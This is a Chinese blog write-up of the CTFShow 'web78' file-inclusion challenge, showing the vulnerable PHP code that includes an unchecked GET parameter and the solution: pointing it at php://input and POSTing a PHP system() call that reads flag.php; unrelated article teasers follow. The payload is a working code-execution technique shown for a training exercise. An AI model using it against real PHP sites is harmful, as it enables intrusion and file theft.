CTFShow 文件包含

时间：2022-10-03 09:44:10浏览次数：85

web78

目的很明显，需要我们去包含一个文件。

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: [email protected]
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

先尝试?file=flag.php试一下，并没有什么效果。
之后根据提示采用伪协议
在url后拼接?file=php://input，在post里输入<?= system('tac flag.php'); ?>即可。

标签：文件,包含,web78,CTFShow,file,php
From： https://www.cnblogs.com/xjy881/p/16750032.html

nginx访问静态资源文件报错403的解决方案
问题描述访问linux服务器得到文件路径正确，但是访问的时候就是报403错误，初步判断应该是权限不够导致的！解决方案给需要访问的文件分配读写权限执行下面的命令给需要......
Java遍历文件夹
Java遍历文件夹简单写了一个打印目录下所有文件以及文件夹的代码，类比于树的遍历，写了深度优先和广度优先的遍历。并且还写了个JDK1.7接口提供的的版本。深度广度遍历都用......
ctfshow 命令执行总结
做完ctfshowweb29~77、118~124的总结，写的比较简略。PHP中简单的eval函数执行字符限制绕过使用通配符*and??c=system('tacf*');使用`执行命令......
18_非单文件组件
1.基本使用<!DOCTYPEhtml><html><head><metacharset="UTF-8"/><title>基本使用</title><scripttype="text/javascript"src="../j......
19_单文件组件
index.html<!DOCTYPEhtml><html><head><metacharset="UTF-8"/><title>练习一下单文件组件的语法</title></head><body><......
C++工程中的（.h文件）和（.cpp）文件如何管理
整个工程的格式应该是这样的:#include"initiate_maze.hpp"voidinitiate_maze(intn,intm){srand(time(NULL));vector<string>things;stringa......
U盘插入自动读写/U盘插入自动复制/python检测U盘的插入，以及进行自动复制文件并写入文
U盘自动读写的小玩意共有四种方法（我了解的，全是转载）方法一（vbs方法全自动，转载自bilibili 点我跳转）文件下载链接（点我下载）方法二（cmd方法需手动，转载自bilibili点我跳转）文......
用户，组，文件权限的管理
概述用户一般来说是指系统的使用者，使用者可以使用这些名称来登录计算机，除了使用者之外，一些系统服务也需要含有部分特权的用户账户运行，因此出于安全考虑，用......
python 导出excel，以文件流形式返回前端
python中使用xlwt库导出excel1.安装依赖包pipinstallxlwt2.写入Excel数据返回前端importxlwtfromflaskimportFlaskapp=Flask(__name__)@app.route('/a......
docker 精简版容器没有vim和vi怎么编辑文件
docker编辑文件精简版没有vi也没有vim，那么要怎么编辑文件？echoabc>>test.txt下载vim在宿主机编写好文件之后copy到容器中使用sed命令Linuxsed命令|菜鸟教程......

CTFShow 文件包含

web78

相关文章

赞助商

阅读排行